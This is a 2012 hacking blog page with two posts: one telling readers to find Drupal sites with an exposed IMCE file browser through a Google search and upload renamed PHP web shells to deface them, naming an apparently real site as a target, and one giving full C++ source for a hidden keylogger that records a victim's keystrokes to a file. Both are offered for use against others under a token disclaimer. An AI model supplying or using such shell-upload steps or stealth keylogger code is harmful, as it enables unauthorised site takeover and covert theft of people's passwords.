New Post

Rss

Friday, July 20, 2012
IMCE Dir Exploit for Hacking Drupal Websites

IMCE Dir Exploit for Hacking Drupal Websites

Hey friends, yesterday i was going through the latest Google dorks and found really interesting stuff. You all will be amazed by knowing the functionality of that dork called as IMCE DIR exploit.

Using IMCE directory exploit we can upload our shells on websites which are made using DRUPAL platform and execute our shells and hence can easily hack the websites or simply say we can deface that website using that loophole. Actually let me provide you more information about this Drupal File Browser bug. IMCE directory opens the file browser of the website from where you can upload images to your websites, so guy for uploading your shells you need to rename your shells like say c99.php to c99.png or r60.php to r60.png etc..

Now lets learn how to deface website or hack website using this bug:
1. First of all open the Google and then type the below query in search box:
inurl:"/imce?dir="

2.   Now search results will appear like below:

3. Now open the links like mentioned below:
www.arcireal.com/imce?dir=imagecache/dettaglio
4.  Now a File browser will open which will allow you to upload and navigate though files:


5. Now upload the shell by clicking on upload button.
6. Access the shell by double clicking on that.
7. Rest things you already know..

Note: This is only for educational purposes. Any misuse is not the responsibility of HackingLoops or me.

I hope you all have enjoyed the article... Keep Reading and keep learning new techniques to hack websites or deface websites...
If you have any doubts ask me in form of comments...

Monday, July 16, 2012
How to code Keylogger in C++ Stepwise by HackingLoops

How to code Keylogger in C++ Stepwise by HackingLoops

Hey friends, today i am going to teach you how to code keylogger in C++ Stepwise. Most of us aware with the functionality of keyloggers, if not let me give you brief information what are keyloggers and why they are so important to Hackers.
code keylogger in C++
Keylogger Code in C++

What is Keylogger ?
Keylogger as the word itself suggest logging or capturing keys or key strokes. Technically, Keylogger is a software tool or program which is used to capture key strokes that user presses in real time and further processing depends on nature of keylogger that it is a physical keylogger or remote keylogger and the technique of capturing key strokes is called keylogging. And it is really hard to believe but keylogging is the easiest method to hack anybody's password, what you need is just a good keylogger, good crypter and knowledge about spreading your keylogger program. Thousands of keyloggers are available in the web world for free but its really irony that all of them are either detectable by antivirus or owner has attached virus to them to hack its users. So its obvious, we need to be cautious while using freely available keyloggers or cracked version of paid keyloggers. But why to try to become a prey to other hackers when designing of new of your own is damn easy. Most novice hackers or simply called script kiddie's think that coding a good keylogger is very tedious and hard task but believe me after reading my this tutorial, it will become a funny task for you guys to code a keylogger. Today i will teach you the complete inward and outward logic of keylogger.

I have divided coding of keylogger in few parts to make it easier for Hackingloops users to understand it properly and if need writing your own logic for different parts if you think my logic is not optimized. So friends lets start learning how to code keylogger in C++ stepwise. As we all know( explained above) that keyloggers capture keystrokes, so there can be several methods to capture the key like capturing the keyboard API Input and output, such keyloggers called API based keyloggers or simply capturing the keys after it gets decoded by your OS ( hardware keyboard sends instructions to OS drivers, which decodes the every key pressed on keyboard into useful alphabets). Today i will teaching you later one. So lets start friends..

Note : You can use Borland C++ compiler or Code blocks C++ compiler for coding the stuff, i usually prefer DEV C++ i.e. Borland C++ compiler.

Now open any of your compilers and create a new project or simply open a text file and name is as anything.cpp ( means whatever you wish).

So lets start coding:
Step 1 : Declaring header directives to include the standard functions
#include <iostream>
using namespace std;     //used to avoid the compilation errors because of redefinition of variables.
#include <windows.h>
#include<winuser.h>
Right now we only need these three header directives and these are mandatory.

Step 2 : Declaring global calls :
int SaveLogs (int key_stroke, char *file);
void Stealth();  //Declare stealth function to make you keylogger hidden.


Step 3 : Main Function ( mandatory field, this executes the complete code and separate functions or classes).
int main() 
{
    Stealth();       // This will call the stealth function.
    char i;          //Here we declare 'i' from the type 'char'

    while (1)     // Here we say 'while (1)' execute the code.
    {          
       for(i = 8; i <= 190; i++)
        {
if (GetAsyncKeyState(i) == -32767)
SaveLogs (i,"MYLOGS.txt");    // This will send the value of 'i' and "MYLOGS.txt" to our SaveLogs function.
        }
    }
    system ("PAUSE"); // Here we say that the system have to wait before exiting.
return 0;
}

/************************************Seperator********/

Step 4 : Writing capturing keys logic
int SaveLogs (int key_stroke, char *file)   // Here we define our SaveLogs function.
{
    if ( (key_stroke == 1) || (key_stroke == 2) )
        return 0;

    FILE *OUTPUT_FILE;
    OUTPUT_FILE = fopen(file, "a+");
    
    cout << key_stroke << endl;

        if (key_stroke == 8)  // The numbers stands for the ascii value of a character
        fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]");  
        else if (key_stroke == 13)
        fprintf(OUTPUT_FILE, "%s", "\n");
        else if (key_stroke == 32)
        fprintf(OUTPUT_FILE, "%s", " ");
        else if (key_stroke == VK_TAB)        
        fprintf(OUTPUT_FILE, "%s", "[TAB]");
            else if (key_stroke == VK_SHIFT)
        fprintf(OUTPUT_FILE, "%s", "[SHIFT]");
            else if (key_stroke == VK_CONTROL)
        fprintf(OUTPUT_FILE, "%s", "[CONTROL]");
                else if (key_stroke == VK_ESCAPE)
        fprintf(OUTPUT_FILE, "%s", "[ESCAPE]");
                else if (key_stroke == VK_END)
        fprintf(OUTPUT_FILE, "%s", "[END]");
                    else if (key_stroke == VK_HOME)
        fprintf(OUTPUT_FILE, "%s", "[HOME]");
                    else if (key_stroke == VK_LEFT)
        fprintf(OUTPUT_FILE, "%s", "[LEFT]");
                        else if (key_stroke == VK_UP)
        fprintf(OUTPUT_FILE, "%s", "[UP]");
                        else if (key_stroke == VK_RIGHT)
        fprintf(OUTPUT_FILE, "%s", "[RIGHT]");
                            else if (key_stroke == VK_DOWN)
        fprintf(OUTPUT_FILE, "%s", "[DOWN]");
                            else if (key_stroke == 190 || key_stroke == 110)
        fprintf(OUTPUT_FILE, "%s", ".");
                            else
                                fprintf(OUTPUT_FILE, "%s", &key_stroke);

fclose (OUTPUT_FILE);
    return 0;
}
/************************************Seperator********/

Step 5 : Stealth function
This part of code will help you to hide your keylogger from victim and kept the program window hidden.
void Stealth()
{
  HWND Stealth;
  AllocConsole();
  Stealth = FindWindowA("ConsoleWindowClass", NULL);
  ShowWindow(Stealth,0);
}

Step 6 : Email Function
:P i will explain it later...

Now compile your code and that will generate one binary file or exe file :P that is your keylogger. And all your logs will
I hope you all have enjoyed the article. Step 6 is not disclosed because i want to explain the difference between physical keylogger and remote keylogger. So guys, now u might got this that this is a Physical keylogger. You can only view data on same machine on which binary is running.

If you have any doubts please ask in form of comments.
Copyright © 2012 Learn How to Hack - Best Online Ethical Hacking Website All Right Reserved
Designed by Hackingloops.